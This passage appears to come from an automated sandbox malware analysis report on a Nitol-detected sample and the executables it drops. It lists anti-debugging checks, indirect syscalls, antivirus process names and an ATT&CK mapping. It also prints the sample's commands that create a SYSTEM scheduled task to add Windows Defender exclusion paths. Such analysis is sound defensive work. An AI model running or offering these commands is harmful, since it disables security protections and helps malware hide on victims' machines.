Source: C:\Users\user\Desktop\45631.exe	RDTSC instruction interceptor: First address: 140001121 second address: 140001137 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d mov ecx, eax 0x0000000f nop 0x00000010 fldpi 0x00000012 nop 0x00000013 frndint 0x00000015 nop 0x00000016 rdtsc
Source: C:\Users\user\Desktop\45631.exe	RDTSC instruction interceptor: First address: 140001137 second address: 140001137 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d sub eax, ecx 0x0000000f nop 0x00000010 dec ecx 0x00000011 cmp eax, ecx 0x00000013 nop 0x00000014 jc 00007F30C4EBA786h 0x00000016 fldpi 0x00000018 nop 0x00000019 frndint 0x0000001b nop 0x0000001c rdtsc
Source: C:\Users\user\Documents\sgH8Ps.exe	RDTSC instruction interceptor: First address: 6C7B55 second address: 6C7B63 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Users\user\Desktop\45631.exe

Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Source: C:\Users\user\Documents\sgH8Ps.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_6-14069
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_42-3231

Source: C:\Users\user\Documents\sgH8Ps.exe

API coverage: 2.7 %

Source: C:\Users\user\Documents\sgH8Ps.exe TID: 4488	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe TID: 1832	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe TID: 6336	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe TID: 4512	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe TID: 6336	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_00007FFDA55DA1B8 FindFirstFileExW,

6_2_00007FFDA55DA1B8

Source: C:\Users\user\Documents\sgH8Ps.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: 45631.exe, 00000000.00000003.2575241713.0000000000640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Twhtlb.exe, 00000028.00000002.3979769502.000000000120E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Documents\sgH8Ps.exe	API call chain: ExitProcess graph end node			graph_6-14070
Source: C:\Users\user\Documents\sgH8Ps.exe	API call chain: ExitProcess graph end node			graph_6-14414

Source: C:\Users\user\Desktop\45631.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_00000001400073E0 LdrLoadDll,

6_2_00000001400073E0

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_0000000140007C91

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_000000014000F000

Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Code function: 40_3_05260643 mov eax, dword ptr fs:[00000030h]		40_3_05260643
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Code function: 40_3_05260643 mov eax, dword ptr fs:[00000030h]		40_3_05260643

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,

6_2_0000000140004630

Source: C:\Users\user\Documents\sgH8Ps.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0000000140007C91
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00000001400106B0
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00000001400092E0 SetUnhandledExceptionFilter,	6_2_00000001400092E0
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00007FFDA55D2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FFDA55D2630
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00007FFDA55D1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FFDA55D1F50
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00007FFDA55D76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FFDA55D76E0
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Code function: 42_2_005210CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_005210CC
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Code function: 42_2_00522AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_00522AE2
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Code function: 42_2_005251FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_005251FB

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\45631.exe	NtDelayExecution: Indirect: 0x1F94CF	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	NtAllocateVirtualMemory: Indirect: 0x140006FD0	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	NtProtectVirtualMemory: Indirect: 0x2A2B253	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	NtProtectVirtualMemory: Indirect: 0x29FB253	Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_00007FFDA55DFD40 cpuid

6_2_00007FFDA55DFD40

Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: GetLocaleInfoA,		6_2_000000014000F370
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Code function: GetLocaleInfoA,		42_2_00526B1A

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

6_2_000000014000A370

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

6_2_0000000140005A70

Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Twhtlb.exe, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: Twhtlb.exe, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 40.2.Twhtlb.exe.2d603e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.Twhtlb.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.Twhtlb.exe.2d603e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Twhtlb.exe PID: 3744, type: MEMORYSTR

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 40.2.Twhtlb.exe.2d603e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.Twhtlb.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.Twhtlb.exe.2d603e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Twhtlb.exe PID: 3744, type: MEMORYSTR

Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,		6_2_00000001400042B0
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		6_2_0000000140003F80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	113 Command and Scripting Interpreter	33 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
